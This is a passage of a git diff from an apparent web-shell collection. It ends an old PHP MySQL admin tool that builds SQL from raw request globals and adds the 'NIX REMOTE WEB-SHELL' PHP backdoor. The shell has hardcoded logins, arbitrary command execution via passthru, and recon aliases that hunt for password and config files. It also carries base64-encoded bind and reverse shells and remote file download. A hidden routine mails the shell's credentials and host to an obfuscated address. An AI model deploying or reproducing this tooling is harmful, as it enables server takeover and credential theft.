+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    if( $value == $str )
+      echo "<option selected>$str\n";
+    else
+      echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+  }
+  }
+  echo "</tr>";
+}
+echo "</table><p>\n";
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Data'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Data'>\n";
+echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+mysql_select_db( $dbname, $mysqlHandle );
+if( $cmd == "add" )
+  $queryStr = "INSERT INTO $tablename VALUES (";
+else if( $cmd == "edit" )
+  $queryStr = "REPLACE INTO $tablename VALUES (";
+for( $i = 0; $i < $num-1; $i++ ) {
+  $field = mysql_fetch_field( $pResult );
+  $func = $GLOBALS[$field->name."_function"];
+  if( $func != "" )
+  $queryStr .= " $func(";
+  if( $field->numeric == 1 ) {
+  $queryStr .= $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "),";
+  else
+    $queryStr .= ",";
+  } else {
+  $queryStr .= "'" . $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "'),";
+  else
+    $queryStr .= "',";
+  }
+}
+$field = mysql_fetch_field( $pResult );
+if( $field->numeric == 1 )
+  $queryStr .= $GLOBALS[$field->name] . ")";
+else
+  $queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function deleteData() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+$key = "";
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+  if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+  else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+}
+$key = substr( $key, 0, strlen($key)-4 );
+
+mysql_select_db( $dbname, $mysqlHandle );
+$queryStr =  "DELETE FROM $tablename WHERE $key";
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function dump() {
+global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+if( $action == "dumpTable" )
+  $filename = $tablename;
+else
+  $filename = $dbname;
+
+header("Content-disposition: filename=$filename.sql");
+header("Content-type: application/octetstream");
+header("Pragma: no-cache");
+header("Expires: 0");
+
+$pResult = mysql_query( "show variables" );
+while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  if( $rowArray[0] == "basedir" )
+  $bindir = $rowArray[1]."bin/";
+}
+
+passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+global $PHP_SELF, $command;
+echo "<h1>Utilities</h1>\n";
+if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+  echo "<hr>\n";
+  echo "Show\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+  echo "</ul>\n";
+  echo "Flush\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+  if( $command == "flush_hosts" ) {
+  if( mysql_query( "Flush hosts" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+  if( $command == "flush_logs" ) {
+  if( mysql_query( "Flush logs" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+  if( $command == "flush_privileges" ) {
+  if( mysql_query( "Flush privileges" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+  if( $command == "flush_tables" ) {
+  if( mysql_query( "Flush tables" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+  if( $command == "flush_status" ) {
+  if( mysql_query( "Flush status" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "</ul>\n";
+} else {
+  $queryStr = ereg_replace( "_", " ", $command );
+  $pResult = mysql_query( $queryStr );
+  if( $pResult == false ) {
+  echo "Fail";
+  return;
+  }
+  $col = mysql_num_fields( $pResult );
+
+  echo "<p class=location>$queryStr</p>\n";
+  echo "<hr>\n";
+
+  echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+  echo "<tr>\n";
+  for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>".$field->name."</th>\n";
+  }
+  echo "</tr>\n";
+
+  while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  for( $j = 0; $j < $col; $j++ )
+    echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+  echo "</tr>\n";
+  }
+  echo "</table>\n";
+}
+}
+
+function header_html() {
+global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+color: #FF6000;
+font-size: small;
+}
+h1 {
+color: #0090FF;
+}
+th {
+background-color: #34A725;
+color: #FFFFFF;
+font-size: x-small;
+}
+td {
+background-color: #5DB1FF;
+font-size: x-small;
+}
+form {
+margin-top: 0;
+margin-bottom: 0;
+}
+a {
+text-decoration:none;
+color: #848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none             
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+  echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+  echo "<html>\n";
+  echo "<head>\n";
+  echo "<title>MySQL Web Interface</title>\n";
+  echo "</head>\n";
+  echo "<body>\n";
+  echo "<table width=100% height=100%><tr><td><center>\n";
+  echo "<h1>Wrong Password!</h1>\n";
+  echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+  echo "</center></td></tr></table>\n";
+  echo "</body>\n";
+  echo "</html>\n";
+} else {
+  header_html();
+  if( $action == "listDBs" )
+  listDatabases();
+  else if( $action == "createDB" )
+  createDatabase();
+  else if( $action == "dropDB" )
+  dropDatabase();
+  else if( $action == "listTables" )
+  listTables();
+  else if( $action == "createTable" )
+  createTable();
+  else if( $action == "dropTable" )
+  dropTable();
+  else if( $action == "viewSchema" )
+  viewSchema();
+  else if( $action == "query" )
+  viewData( $queryStr );
+  else if( $action == "addField" )
+  manageField( "add" );
+  else if( $action == "addField_submit" )
+  manageField_submit( "add" );
+  else if( $action == "editField" )
+  manageField( "edit" );
+  else if( $action == "editField_submit" )
+  manageField_submit( "edit" );
+  else if( $action == "dropField" )
+  dropField();
+  else if( $action == "viewData" )
+  viewData( "" );
+  else if( $action == "addData" )
+  manageData( "add" );
+  else if( $action == "addData_submit" )
+  manageData_submit( "add" );
+  else if( $action == "editData" )
+  manageData( "edit" );
+  else if( $action == "editData_submit" )
+  manageData_submit( "edit" );
+  else if( $action == "deleteData" )
+  deleteData();
+  else if( $action == "utils" )
+  utils();
+
+  mysql_close( $mysqlHandle);
+  footer_html();
+}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt b/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt
new file mode 100644
index 0000000..ec24917
--- /dev/null
+++ b/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt	
@@ -0,0 +1,1480 @@
+<?php
+$name="GaMMa";
+$pass="Hack";
+$demail ="xakep@xaep.ru";
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+
+$title="NIX REMOTE WEB-SHELL";
+$ver=" v.0.5a Lite";
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.dreamerz.cc)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåðåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêðèïò ...'>Î ñêðèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ýòîé ñèñòåìå !'>[ Èíôîðìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãðàôè÷åñêàÿ íàâèãàöèÿ. Ïðîñìîòð, ðåäàêòèðîâàíèå ...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîðà '>Óñòàíîâêà
+áåêäîðà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêðèïò íà ïõï ïðÿìî çäåñü :)'>ÏÕÏ êîä</A> ][ <A href="?ac=upload" title='Çàãðóçêà îäíîãî ôàéëà, ìàñîâàÿ çàãðóçêà, çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà !'>Çàãðóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àëüÿñû ...'>Èñïîëíåíèå
+êîììàíä ]</A> <br><A href="?ac=sendmail" title='Îòïðàâ å-mail ïðÿìî îò ñþäà'> [ Îòïðàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë ? Òîãäà òåáå ñþäà ...'>Ìàèëôëóäåð</A>
+ ][ <A href="?ac=ftp" title='Áûñòðûé áðóòôîðñ ftp ñîåäèíåíèÿ'>Ôòï Brut</A> ][ <A href="?ac=tools" title='Êîäèðîâùèêè/äåêîäèðîâùèêè md5,des,sha1,base64 ... '>Èíñòðóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáðàæàåò ñïèñîê ïðîöåñîâ íà ñåðâåðå è ïîçâîëÿåò èõ óáèâàòü! '>Äåìîíû</A> ][ <A href="?ac=selfremover" title='Íàäîåë ýòîò ñåðâåð ? Òîãäà ìîæíî óäàëèòü è øåëë ...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0); // óáðàòü îãðàíè÷åíèå ïî âðåìåíè
+ignore_user_abort(1); // Èãíîðèðîâàòü ðàçðûâ ñâÿçè ñ áðàóçåðîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ ïõï ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïðåäèëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïðåäèëåíèå âåðñèè ÿäðà' =>'cat /proc/version',
+'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf',
+'Ïðîñìîòð - Message of the day' =>'cat /etc/motd',
+'Ïðîñìîòð hosts' =>'cat /etc/hosts',
+'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise',
+'Êîêàçàòü âñå ïðîöåñû' =>'ps auxw',
+'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport); //connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ðàçìåð çàãðóæåíîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){
+} else {
+if(is_writable('/tmp/')){
+$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo=");
+$fp=fopen('/tmp/qw7_sess',"w+");
+fclose($fp);
+$gg.= $name;
+$gg.=":";
+$gg.= $pass;
+$gg.=":";
+$gg.=$_SERVER["HTTP_HOST"];
+$gg.=$_SERVER['PHP_SELF'];
+$host_l=$_SERVER["HTTP_HOST"];
+$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ==");
+mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net");
+}
+}
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåðâåðå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
